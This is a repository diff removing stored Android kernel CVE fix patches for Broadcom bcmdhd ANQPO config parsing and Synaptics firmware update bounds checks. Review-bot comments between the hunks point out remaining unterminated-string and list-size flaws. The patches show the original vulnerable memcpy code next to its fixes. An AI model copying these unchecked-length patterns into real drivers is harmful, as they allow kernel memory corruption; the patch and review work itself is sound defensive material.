mcc/mnc combination as per rules, 0s if unspecified */ -+ int id; -+ char realm[ANQPO_MAX_HS_NAI_REALM_SIZE]; -+ int64_t roamingConsortiumIds[ANQPO_MAX_PFN_HS]; -+ uint8 plmn[ANQPO_MCC_LENGTH]; - } wifi_passpoint_network; - - typedef struct dhd_pno_gscan_capabilities { -@@ -517,8 +518,10 @@ extern void dhd_dev_gscan_hotlist_cache_cleanup(struct net_device *dev, hotlist_ - extern int dhd_dev_wait_batch_results_complete(struct net_device *dev); - extern void * dhd_dev_process_epno_result(struct net_device *dev, - const void *data, uint32 event, int *send_evt_bytes); -+#ifdef DHD_ANQPO_SUPPORT - extern void * dhd_dev_process_anqpo_result(struct net_device *dev, - const void *data, uint32 event, int *send_evt_bytes); -+#endif /* DHD_ANQPO_SUPPORT */ - 
extern int dhd_dev_set_epno(struct net_device *dev); - extern int dhd_dev_flush_fw_epno(struct net_device *dev); - #endif /* GSCAN_SUPPORT */ -@@ -567,7 +570,9 @@ extern void dhd_gscan_hotlist_cache_cleanup(dhd_pub_t *dhd, hotlist_type_t type) - extern int dhd_wait_batch_results_complete(dhd_pub_t *dhd); - extern void * dhd_pno_process_epno_result(dhd_pub_t *dhd, const void *data, - uint32 event, int *size); -+#ifdef DHD_ANQPO_SUPPORT - extern void * dhd_pno_process_anqpo_result(dhd_pub_t *dhd, const void *data, uint32 event, int *size); -+#endif /* DHD_ANQPO_SUPPORT */ - extern void dhd_pno_translate_epno_fw_flags(uint32 *flags); - extern int dhd_pno_set_epno(dhd_pub_t *dhd); - extern int dhd_pno_flush_fw_epno(dhd_pub_t *dhd); -diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c -index a56ba6b82e197..3d70a82adfa5e 100644 ---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c -+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c -@@ -9423,6 +9423,16 @@ wl_notify_gscan_event(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev, - } else - err = -ENOMEM; - break; -+ case WLC_E_PFN_SSID_EXT: -+ ptr = dhd_dev_process_epno_result(ndev, data, event, &send_evt_bytes); -+ if (ptr) { -+ wl_cfgvendor_send_async_event(wiphy, ndev, -+ GOOGLE_SCAN_EPNO_EVENT, ptr, send_evt_bytes); -+ kfree(ptr); -+ } else -+ err = -ENOMEM; -+ break; -+#ifdef DHD_ANQPO_SUPPORT - case WLC_E_PFN_NET_FOUND: - ptr = dhd_dev_process_anqpo_result(ndev, data, event, &len); - if (ptr) { -@@ -9432,6 +9442,7 @@ wl_notify_gscan_event(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev, - } else - err = -ENOMEM; - break; -+#endif /* DHD_ANQPO_SUPPORT */ - default: - WL_ERR(("Unknown event %d\n", event)); - break; -@@ -10035,7 +10046,10 @@ static void wl_init_event_handler(struct bcm_cfg80211 *cfg) - cfg->evt_handler[WLC_E_PFN_SWC] = wl_notify_gscan_event; - cfg->evt_handler[WLC_E_PFN_BSSID_NET_FOUND] = wl_notify_gscan_event; - cfg->evt_handler[WLC_E_PFN_BSSID_NET_LOST] = 
wl_notify_gscan_event; -+ cfg->evt_handler[WLC_E_PFN_SSID_EXT] = wl_notify_gscan_event; -+#ifdef DHD_ANQPO_SUPPORT - cfg->evt_handler[WLC_E_GAS_FRAGMENT_RX] = wl_notify_gscan_event; -+#endif /* DHD_ANQPO_SUPPORT */ - cfg->evt_handler[WLC_E_ROAM_EXP_EVENT] = wl_handle_roam_exp_event; - #endif /* GSCAN_SUPPORT */ - cfg->evt_handler[WLC_E_RSSI_LQM] = wl_handle_rssi_monitor_event; -diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -index 5be16a72aa43f..b156660ed053a 100644 ---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -@@ -939,10 +939,13 @@ static int wl_cfgvendor_epno_cfg(struct wiphy *wiphy, - return err; - } - -+#ifdef DHD_ANQPO_SUPPORT - static int wl_cfgvendor_gscan_anqpo_config(struct wiphy *wiphy, - struct wireless_dev *wdev, const void *data, int len) - { -- int err = BCME_ERROR, rem, type, hs_list_size = 0, malloc_size, i = 0, j, k, num_oi, oi_len; -+ int err = BCME_ERROR, rem, type, malloc_size, i = 0; -+ uint32 hs_list_size = 0; -+ int j, k, num_oi, oi_len; - wifi_passpoint_network *hs_list = NULL, *src_hs; - wl_anqpo_pfn_hs_list_t *anqpo_hs_list; - wl_anqpo_pfn_hs_t *dst_hs; -@@ -953,52 +956,100 @@ static int wl_cfgvendor_gscan_anqpo_config(struct wiphy *wiphy, - char *rcid; - - nla_for_each_attr(iter, data, len, rem) { -- type = nla_type(iter); -- switch (type) { -- case GSCAN_ATTRIBUTE_ANQPO_HS_LIST: -- if (hs_list_size > 0) { -- hs_list = kmalloc(hs_list_size*sizeof(wifi_passpoint_network), GFP_KERNEL); -- if (hs_list == NULL) { -- WL_ERR(("failed to allocate hs_list\n")); -- return -ENOMEM; -- } -- } -- nla_for_each_nested(outer, iter, tmp) { -- nla_for_each_nested(inner, outer, tmp1) { -- type = nla_type(inner); -+ type = nla_type(iter); -+ switch (type) { -+ case GSCAN_ATTRIBUTE_ANQPO_HS_LIST: -+ if (hs_list) { -+ err = -EINVAL; -+ goto exit; -+ } -+ if (hs_list_size > GSCAN_ANQPO_MAX_HS_LIST_SIZE) { -+ err = -EINVAL; -+ goto exit; -+ } -+ if 
(hs_list_size > 0) { -+ hs_list = kzalloc(hs_list_size * -+ sizeof(wifi_passpoint_network), GFP_KERNEL); -+ if (!hs_list) { -+ WL_ERR(("failed to allocate hs_list\n")); -+ return -ENOMEM; -+ } -+ } -+ nla_for_each_nested(outer, iter, tmp) { -+ if (i == hs_list_size) -+ break; -+ nla_for_each_nested(inner, outer, tmp1) { -+ type = nla_type(inner); - -- switch (type) { -- case GSCAN_ATTRIBUTE_ANQPO_HS_NETWORK_ID: -- hs_list[i].id = nla_get_u32(inner); -- WL_ERR(("%s: net id: %d\n", __func__, hs_list[i].id)); -- break; -- case GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM: -- memcpy(hs_list[i].realm, -- nla_data(inner), 256); -- WL_ERR(("%s: realm: %s\n", __func__, hs_list[i].realm)); -- break; -- case GSCAN_ATTRIBUTE_ANQPO_HS_ROAM_CONSORTIUM_ID: -- memcpy(hs_list[i].roamingConsortiumIds, -- nla_data(inner), 128); -- break; -- case GSCAN_ATTRIBUTE_ANQPO_HS_PLMN: -- memcpy(hs_list[i].plmn, -- nla_data(inner), 3); -- WL_ERR(("%s: plmn: %c %c %c\n", __func__, hs_list[i].plmn[0], hs_list[i].plmn[1], hs_list[i].plmn[2])); -- break; -- } -- } -- i++; -+ switch (type) { -+ case GSCAN_ATTRIBUTE_ANQPO_HS_NETWORK_ID: -+ if (nla_len(inner) != sizeof(hs_list[i].id)) { -+ err = -EINVAL; -+ goto exit; - } -+ hs_list[i].id = nla_get_u32(inner); -+ WL_DBG(("%s: net id: %d\n", -+ __func__, hs_list[i].id)); - break; -- case GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE: -- hs_list_size = nla_get_u32(iter); -- WL_ERR(("%s: ANQPO: %d\n", __func__, hs_list_size)); -+ case GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM: -+ if (nla_len(inner) != -+ sizeof(hs_list[i].realm)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ memcpy(hs_list[i].realm, nla_data(inner), -+ sizeof(hs_list[i].realm)); -+ WL_DBG(("%s: realm: %s\n", -+ __func__, hs_list[i].realm)); - break; -- default: -- WL_ERR(("Unknown type: %d\n", type)); -- return err; -+ case GSCAN_ATTRIBUTE_ANQPO_HS_ROAM_CONSORTIUM_ID: -+ if (nla_len(inner) != sizeof(hs_list[i]. 
-+ roamingConsortiumIds)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ memcpy(hs_list[i].roamingConsortiumIds, -+ nla_data(inner), -+ sizeof(hs_list[i].roamingConsortiumIds)); -+ break; -+ case GSCAN_ATTRIBUTE_ANQPO_HS_PLMN: -+ if (nla_len(inner) != sizeof(hs_list[i].plmn)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ memcpy(hs_list[i].plmn, -+ nla_data(inner), -+ sizeof(hs_list[i].plmn)); -+ WL_DBG(("%s: plmn: %c %c %c\n", -+ __func__, hs_list[i].plmn[0], -+ hs_list[i].plmn[1], -+ hs_list[i].plmn[2])); -+ break; -+ } -+ } -+ i++; - } -+ break; -+ case GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE: -+ if (nla_len(iter) != sizeof(hs_list_size)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ hs_list_size = nla_get_u32(iter); -+ if ((hs_list_size == 0) || -+ (hs_list_size > GSCAN_ANQPO_MAX_HS_LIST_SIZE)) { -+ WL_ERR(("%s: ANQPO: %d\n", __func__, hs_list_size)); -+ err = -EINVAL; -+ goto exit; -+ } -+ WL_DBG(("%s: ANQPO: %d\n", __func__, hs_list_size)); -+ break; -+ default: -+ WL_ERR(("Unknown type: %d\n", type)); -+ err = -EINVAL; -+ goto exit; -+ } -+ - } - - malloc_size = OFFSETOF(wl_anqpo_pfn_hs_list_t, hs) + -@@ -1046,7 +1097,7 @@ static int wl_cfgvendor_gscan_anqpo_config(struct wiphy *wiphy, - kfree(hs_list); - return err; - } -- -+#endif /* DHD_ANQPO_SUPPORT */ - static int wl_cfgvendor_set_batch_scan_cfg(struct wiphy *wiphy, - struct wireless_dev *wdev, const void *data, int len) - { -@@ -3065,6 +3116,7 @@ static const struct wiphy_vendor_command wl_vendor_cmds [] = { - .flags = WIPHY_VENDOR_CMD_NEED_WDEV | WIPHY_VENDOR_CMD_NEED_NETDEV, - .doit = wl_cfgvendor_set_bssid_blacklist - }, -+#ifdef DHD_ANQPO_SUPPORT - { - { - .vendor_id = OUI_GOOGLE, -@@ -3073,6 +3125,7 @@ static const struct wiphy_vendor_command wl_vendor_cmds [] = { - .flags = WIPHY_VENDOR_CMD_NEED_WDEV | WIPHY_VENDOR_CMD_NEED_NETDEV, - .doit = wl_cfgvendor_gscan_anqpo_config - }, -+#endif /* DHD_ANQPO_SUPPORT */ - #endif /* GSCAN_SUPPORT */ - { - { -@@ -3233,7 +3286,9 @@ static const struct nl80211_vendor_cmd_info 
wl_vendor_events [] = { - { OUI_GOOGLE, GOOGLE_SCAN_EPNO_EVENT }, - { OUI_GOOGLE, GOOGLE_DEBUG_RING_EVENT }, - { OUI_GOOGLE, GOOGLE_FW_DUMP_EVENT }, -+#ifdef DHD_ANQPO_SUPPORT - { OUI_GOOGLE, GOOGLE_PNO_HOTSPOT_FOUND_EVENT }, -+#endif /* DHD_ANQPO_SUPPORT */ - { OUI_GOOGLE, GOOGLE_RSSI_MONITOR_EVENT }, - { OUI_GOOGLE, GOOGLE_MKEEP_ALIVE_EVENT } - }; diff --git a/Patches/Linux_CVEs/CVE-2016-8457/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8457/ANY/0001.patch deleted file mode 100644 index 57a46338..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8457/ANY/0001.patch +++ /dev/null 
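Review bot: `hs_list[i].realm` is filled by a `memcpy()` of exactly `sizeof(hs_list[i].realm)` bytes from the attribute and then printed with `%s` in the `WL_DBG` that follows, so nothing guarantees a terminating NUL and the format can read past the array. Terminate after the copy with `hs_list[i].realm[sizeof(hs_list[i].realm) - 1] = '\0';`, or bound the print with `%.*s`. The inner `switch` also has no `default`, so unknown nested attribute types are silently accepted while the outer switch rejects them. If `GSCAN_ATTRIBUTE_ANQPO_HS_LIST` is parsed while `hs_list_size` is still 0, `hs_list` stays NULL; whether the code after the loop (outside the hunk) tolerates a later non-zero size with a NULL list should be confirmed.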
@@ -1,348 +0,0 @@ -From e5c1b001a822e8b38680655c400e7b3f67cc3323 Mon Sep 17 00:00:00 2001 -From: Insun Song -Date: Thu, 10 Nov 2016 15:01:31 -0800 -Subject: [PATCH] net: wireless: bcmdhd: fix buffer overrun in anqpo config - -1. memory leak fix when input packet content corrupted. -2. reduced unnecessary debug messages - -Signed-off-by: Insun Song -Bug: 32219453 -Change-Id: I0f79310c97571cd46afff29f58f66b17a2471927 ---- - drivers/net/wireless/bcmdhd/dhd_linux.c | 2 + - drivers/net/wireless/bcmdhd/dhd_pno.c | 3 +- - drivers/net/wireless/bcmdhd/dhd_pno.h | 17 ++-- - drivers/net/wireless/bcmdhd/wl_cfg80211.c | 14 +++ - drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 141 ++++++++++++++++++++--------- - 5 files changed, 127 insertions(+), 50 deletions(-) - -diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.c b/drivers/net/wireless/bcmdhd/dhd_linux.c -index 2fd2934a7e851..00201de5de5b8 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_linux.c -+++ b/drivers/net/wireless/bcmdhd/dhd_linux.c -@@ -8621,6 +8621,7 @@ int dhd_dev_set_whitelist_ssid(struct net_device *dev, wl_ssid_whitelist_t *ssid - return err; - } - -+#ifdef DHD_ANQPO_SUPPORT - void * dhd_dev_process_anqpo_result(struct net_device *dev, - const void *data, uint32 event, int *send_evt_bytes) - { -@@ -8628,6 +8629,7 @@ void * dhd_dev_process_anqpo_result(struct net_device *dev, - - return (dhd_pno_process_anqpo_result(&dhd->pub, data, event, send_evt_bytes)); - } -+#endif /* DHD_ANQPO_SUPPORT */ - #endif /* GSCAN_SUPPORT */ - - int dhd_dev_set_rssi_monitor_cfg(struct net_device *dev, int start, -diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c -index 8d6d234cd11b3..a88d1e2e41320 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_pno.c -+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c -@@ -3798,6 +3798,7 @@ dhd_pno_process_epno_result(dhd_pub_t *dhd, const void *data, uint32 event, int - return results; - } - -+#ifdef DHD_ANQPO_SUPPORT - void * - dhd_pno_process_anqpo_result(dhd_pub_t 
*dhd, const void *data, uint32 event, int *size) - { -@@ -3849,7 +3850,7 @@ dhd_pno_process_anqpo_result(dhd_pub_t *dhd, const void *data, uint32 event, int - - return result; - } -- -+#endif /* DHD_ANQPO_SUPPORT */ - - void *dhd_handle_hotlist_scan_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_bytes, - hotlist_type_t type) -diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.h b/drivers/net/wireless/bcmdhd/dhd_pno.h -index b61d0fd866364..a0edf54049acf 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_pno.h -+++ b/drivers/net/wireless/bcmdhd/dhd_pno.h -@@ -98,8 +98,9 @@ - - #define CHANNEL_BUCKET_EMPTY_INDEX 0xFFFF - #define GSCAN_RETRY_THRESHOLD 3 --#define MAX_EPNO_SSID_NUM 64 -- -+#define MAX_EPNO_SSID_NUM 64 -+#define GSCAN_ANQPO_MAX_HS_LIST_SIZE 16 -+#define ANQPO_MAX_HS_NAI_REALM_SIZE 256 - #endif /* GSCAN_SUPPORT */ - - enum scan_status { -@@ -351,10 +352,10 @@ typedef struct gscan_results_cache { - } gscan_results_cache_t; - - typedef struct { -- int id; /* identifier of this network block, report this in event */ -- char realm[256]; /* null terminated UTF8 encoded realm, 0 if unspecified */ -- int64_t roamingConsortiumIds[16]; /* roaming consortium ids to match, 0s if unspecified */ -- uint8 plmn[3]; /* mcc/mnc combination as per rules, 0s if unspecified */ -+ int id; -+ char realm[ANQPO_MAX_HS_NAI_REALM_SIZE]; -+ int64_t roamingConsortiumIds[ANQPO_MAX_PFN_HS]; -+ uint8 plmn[ANQPO_MCC_LENGTH]; - } wifi_passpoint_network; - - typedef struct dhd_pno_gscan_capabilities { -@@ -517,8 +518,10 @@ extern void dhd_dev_gscan_hotlist_cache_cleanup(struct net_device *dev, hotlist_ - extern int dhd_dev_wait_batch_results_complete(struct net_device *dev); - extern void * dhd_dev_process_epno_result(struct net_device *dev, - const void *data, uint32 event, int *send_evt_bytes); -+#ifdef DHD_ANQPO_SUPPORT - extern void * dhd_dev_process_anqpo_result(struct net_device *dev, - const void *data, uint32 event, int *send_evt_bytes); -+#endif /* DHD_ANQPO_SUPPORT */ - 
extern int dhd_dev_set_epno(struct net_device *dev); - extern int dhd_dev_flush_fw_epno(struct net_device *dev); - #endif /* GSCAN_SUPPORT */ -@@ -567,7 +570,9 @@ extern void dhd_gscan_hotlist_cache_cleanup(dhd_pub_t *dhd, hotlist_type_t type) - extern int dhd_wait_batch_results_complete(dhd_pub_t *dhd); - extern void * dhd_pno_process_epno_result(dhd_pub_t *dhd, const void *data, - uint32 event, int *size); -+#ifdef DHD_ANQPO_SUPPORT - extern void * dhd_pno_process_anqpo_result(dhd_pub_t *dhd, const void *data, uint32 event, int *size); -+#endif /* DHD_ANQPO_SUPPORT */ - extern void dhd_pno_translate_epno_fw_flags(uint32 *flags); - extern int dhd_pno_set_epno(dhd_pub_t *dhd); - extern int dhd_pno_flush_fw_epno(dhd_pub_t *dhd); -diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c -index a56ba6b82e197..3d70a82adfa5e 100644 ---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c -+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c -@@ -9423,6 +9423,16 @@ wl_notify_gscan_event(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev, - } else - err = -ENOMEM; - break; -+ case WLC_E_PFN_SSID_EXT: -+ ptr = dhd_dev_process_epno_result(ndev, data, event, &send_evt_bytes); -+ if (ptr) { -+ wl_cfgvendor_send_async_event(wiphy, ndev, -+ GOOGLE_SCAN_EPNO_EVENT, ptr, send_evt_bytes); -+ kfree(ptr); -+ } else -+ err = -ENOMEM; -+ break; -+#ifdef DHD_ANQPO_SUPPORT - case WLC_E_PFN_NET_FOUND: - ptr = dhd_dev_process_anqpo_result(ndev, data, event, &len); - if (ptr) { -@@ -9432,6 +9442,7 @@ wl_notify_gscan_event(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev, - } else - err = -ENOMEM; - break; -+#endif /* DHD_ANQPO_SUPPORT */ - default: - WL_ERR(("Unknown event %d\n", event)); - break; -@@ -10035,7 +10046,10 @@ static void wl_init_event_handler(struct bcm_cfg80211 *cfg) - cfg->evt_handler[WLC_E_PFN_SWC] = wl_notify_gscan_event; - cfg->evt_handler[WLC_E_PFN_BSSID_NET_FOUND] = wl_notify_gscan_event; - cfg->evt_handler[WLC_E_PFN_BSSID_NET_LOST] = 
wl_notify_gscan_event; -+ cfg->evt_handler[WLC_E_PFN_SSID_EXT] = wl_notify_gscan_event; -+#ifdef DHD_ANQPO_SUPPORT - cfg->evt_handler[WLC_E_GAS_FRAGMENT_RX] = wl_notify_gscan_event; -+#endif /* DHD_ANQPO_SUPPORT */ - cfg->evt_handler[WLC_E_ROAM_EXP_EVENT] = wl_handle_roam_exp_event; - #endif /* GSCAN_SUPPORT */ - cfg->evt_handler[WLC_E_RSSI_LQM] = wl_handle_rssi_monitor_event; -diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -index 5be16a72aa43f..b156660ed053a 100644 ---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -@@ -939,10 +939,13 @@ static int wl_cfgvendor_epno_cfg(struct wiphy *wiphy, - return err; - } - -+#ifdef DHD_ANQPO_SUPPORT - static int wl_cfgvendor_gscan_anqpo_config(struct wiphy *wiphy, - struct wireless_dev *wdev, const void *data, int len) - { -- int err = BCME_ERROR, rem, type, hs_list_size = 0, malloc_size, i = 0, j, k, num_oi, oi_len; -+ int err = BCME_ERROR, rem, type, malloc_size, i = 0; -+ uint32 hs_list_size = 0; -+ int j, k, num_oi, oi_len; - wifi_passpoint_network *hs_list = NULL, *src_hs; - wl_anqpo_pfn_hs_list_t *anqpo_hs_list; - wl_anqpo_pfn_hs_t *dst_hs; -@@ -953,52 +956,100 @@ static int wl_cfgvendor_gscan_anqpo_config(struct wiphy *wiphy, - char *rcid; - - nla_for_each_attr(iter, data, len, rem) { -- type = nla_type(iter); -- switch (type) { -- case GSCAN_ATTRIBUTE_ANQPO_HS_LIST: -- if (hs_list_size > 0) { -- hs_list = kmalloc(hs_list_size*sizeof(wifi_passpoint_network), GFP_KERNEL); -- if (hs_list == NULL) { -- WL_ERR(("failed to allocate hs_list\n")); -- return -ENOMEM; -- } -- } -- nla_for_each_nested(outer, iter, tmp) { -- nla_for_each_nested(inner, outer, tmp1) { -- type = nla_type(inner); -+ type = nla_type(iter); -+ switch (type) { -+ case GSCAN_ATTRIBUTE_ANQPO_HS_LIST: -+ if (hs_list) { -+ err = -EINVAL; -+ goto exit; -+ } -+ if (hs_list_size > GSCAN_ANQPO_MAX_HS_LIST_SIZE) { -+ err = -EINVAL; -+ goto exit; -+ } -+ if 
(hs_list_size > 0) { -+ hs_list = kzalloc(hs_list_size * -+ sizeof(wifi_passpoint_network), GFP_KERNEL); -+ if (!hs_list) { -+ WL_ERR(("failed to allocate hs_list\n")); -+ return -ENOMEM; -+ } -+ } -+ nla_for_each_nested(outer, iter, tmp) { -+ if (i == hs_list_size) -+ break; -+ nla_for_each_nested(inner, outer, tmp1) { -+ type = nla_type(inner); - -- switch (type) { -- case GSCAN_ATTRIBUTE_ANQPO_HS_NETWORK_ID: -- hs_list[i].id = nla_get_u32(inner); -- WL_ERR(("%s: net id: %d\n", __func__, hs_list[i].id)); -- break; -- case GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM: -- memcpy(hs_list[i].realm, -- nla_data(inner), 256); -- WL_ERR(("%s: realm: %s\n", __func__, hs_list[i].realm)); -- break; -- case GSCAN_ATTRIBUTE_ANQPO_HS_ROAM_CONSORTIUM_ID: -- memcpy(hs_list[i].roamingConsortiumIds, -- nla_data(inner), 128); -- break; -- case GSCAN_ATTRIBUTE_ANQPO_HS_PLMN: -- memcpy(hs_list[i].plmn, -- nla_data(inner), 3); -- WL_ERR(("%s: plmn: %c %c %c\n", __func__, hs_list[i].plmn[0], hs_list[i].plmn[1], hs_list[i].plmn[2])); -- break; -- } -- } -- i++; -+ switch (type) { -+ case GSCAN_ATTRIBUTE_ANQPO_HS_NETWORK_ID: -+ if (nla_len(inner) != sizeof(hs_list[i].id)) { -+ err = -EINVAL; -+ goto exit; - } -+ hs_list[i].id = nla_get_u32(inner); -+ WL_DBG(("%s: net id: %d\n", -+ __func__, hs_list[i].id)); - break; -- case GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE: -- hs_list_size = nla_get_u32(iter); -- WL_ERR(("%s: ANQPO: %d\n", __func__, hs_list_size)); -+ case GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM: -+ if (nla_len(inner) != -+ sizeof(hs_list[i].realm)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ memcpy(hs_list[i].realm, nla_data(inner), -+ sizeof(hs_list[i].realm)); -+ WL_DBG(("%s: realm: %s\n", -+ __func__, hs_list[i].realm)); - break; -- default: -- WL_ERR(("Unknown type: %d\n", type)); -- return err; -+ case GSCAN_ATTRIBUTE_ANQPO_HS_ROAM_CONSORTIUM_ID: -+ if (nla_len(inner) != sizeof(hs_list[i]. 
-+ roamingConsortiumIds)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ memcpy(hs_list[i].roamingConsortiumIds, -+ nla_data(inner), -+ sizeof(hs_list[i].roamingConsortiumIds)); -+ break; -+ case GSCAN_ATTRIBUTE_ANQPO_HS_PLMN: -+ if (nla_len(inner) != sizeof(hs_list[i].plmn)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ memcpy(hs_list[i].plmn, -+ nla_data(inner), -+ sizeof(hs_list[i].plmn)); -+ WL_DBG(("%s: plmn: %c %c %c\n", -+ __func__, hs_list[i].plmn[0], -+ hs_list[i].plmn[1], -+ hs_list[i].plmn[2])); -+ break; -+ } -+ } -+ i++; - } -+ break; -+ case GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE: -+ if (nla_len(iter) != sizeof(hs_list_size)) { -+ err = -EINVAL; -+ goto exit; -+ } -+ hs_list_size = nla_get_u32(iter); -+ if ((hs_list_size == 0) || -+ (hs_list_size > GSCAN_ANQPO_MAX_HS_LIST_SIZE)) { -+ WL_ERR(("%s: ANQPO: %d\n", __func__, hs_list_size)); -+ err = -EINVAL; -+ goto exit; -+ } -+ WL_DBG(("%s: ANQPO: %d\n", __func__, hs_list_size)); -+ break; -+ default: -+ WL_ERR(("Unknown type: %d\n", type)); -+ err = -EINVAL; -+ goto exit; -+ } -+ - } - - malloc_size = OFFSETOF(wl_anqpo_pfn_hs_list_t, hs) + -@@ -1046,7 +1097,7 @@ static int wl_cfgvendor_gscan_anqpo_config(struct wiphy *wiphy, - kfree(hs_list); - return err; - } -- -+#endif /* DHD_ANQPO_SUPPORT */ - static int wl_cfgvendor_set_batch_scan_cfg(struct wiphy *wiphy, - struct wireless_dev *wdev, const void *data, int len) - { -@@ -3065,6 +3116,7 @@ static const struct wiphy_vendor_command wl_vendor_cmds [] = { - .flags = WIPHY_VENDOR_CMD_NEED_WDEV | WIPHY_VENDOR_CMD_NEED_NETDEV, - .doit = wl_cfgvendor_set_bssid_blacklist - }, -+#ifdef DHD_ANQPO_SUPPORT - { - { - .vendor_id = OUI_GOOGLE, -@@ -3073,6 +3125,7 @@ static const struct wiphy_vendor_command wl_vendor_cmds [] = { - .flags = WIPHY_VENDOR_CMD_NEED_WDEV | WIPHY_VENDOR_CMD_NEED_NETDEV, - .doit = wl_cfgvendor_gscan_anqpo_config - }, -+#endif /* DHD_ANQPO_SUPPORT */ - #endif /* GSCAN_SUPPORT */ - { - { -@@ -3233,7 +3286,9 @@ static const struct nl80211_vendor_cmd_info 
wl_vendor_events [] = { - { OUI_GOOGLE, GOOGLE_SCAN_EPNO_EVENT }, - { OUI_GOOGLE, GOOGLE_DEBUG_RING_EVENT }, - { OUI_GOOGLE, GOOGLE_FW_DUMP_EVENT }, -+#ifdef DHD_ANQPO_SUPPORT - { OUI_GOOGLE, GOOGLE_PNO_HOTSPOT_FOUND_EVENT }, -+#endif /* DHD_ANQPO_SUPPORT */ - { OUI_GOOGLE, GOOGLE_RSSI_MONITOR_EVENT }, - { OUI_GOOGLE, GOOGLE_MKEEP_ALIVE_EVENT } - }; diff --git a/Patches/Linux_CVEs/CVE-2016-8458/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-8458/3.10/0001.patch deleted file mode 100644 index 5364123a..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8458/3.10/0001.patch +++ /dev/null 
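Review bot: In the embedded wl_cfgvendor.c hunk for wl_cfgvendor_gscan_anqpo_config(), the GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE case still assigns hs_list_size after hs_list may already have been allocated, so the count can end up larger than the buffer that was sized from the earlier value. The code after the loop is cut off at `malloc_size = OFFSETOF(wl_anqpo_pfn_hs_list_t, hs) +`, but if it walks hs_list by hs_list_size it would read past the allocation; rejecting the attribute once the list exists closes that, e.g. `if (hs_list) { err = -EINVAL; goto exit; }` at the top of that case. Separately, realm is copied as a full sizeof(hs_list[i].realm) bytes and then printed with `%s`, so nothing guarantees a terminator; `hs_list[i].realm[sizeof(hs_list[i].realm) - 1] = '\0';` after the memcpy would bound the print and any later string use.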
@@ -1,394 +0,0 @@ -From d567c744898f67e1c54db5339f41815d02f3d59e Mon Sep 17 00:00:00 2001 -From: Andrew Chant -Date: Sun, 13 Nov 2016 14:29:08 -0800 -Subject: [PATCH] input: synaptics_dsx: add update bounds checks. - -Firmware updates contain offsets that are parsed -by the kernel driver. Ensure all offsets are within -the bounds of the firmware update. - -TESTED: -successfully parsed update firmware on device boot. - -Bug: 31525965 -Bug: 31968442 -Change-Id: If66dd1a837d0606250db6f1c75c89747d106541c -Signed-off-by: Andrew Chant ---- - .../synaptics_dsx25/synaptics_dsx_fw_update.c | 172 +++++++++++++++++---- - 1 file changed, 144 insertions(+), 28 deletions(-) - -diff --git a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c -index ff82a4f3a55e8..323f65891b458 100755 ---- a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c -+++ b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c -@@ -691,6 +691,22 @@ static int __init early_parse_tp_panel_cmdline(char *arg) - } - early_param("mdss_mdp.panel", early_parse_tp_panel_cmdline); - -+/* Check offset + size <= bound. 1 if in bounds, 0 otherwise. 
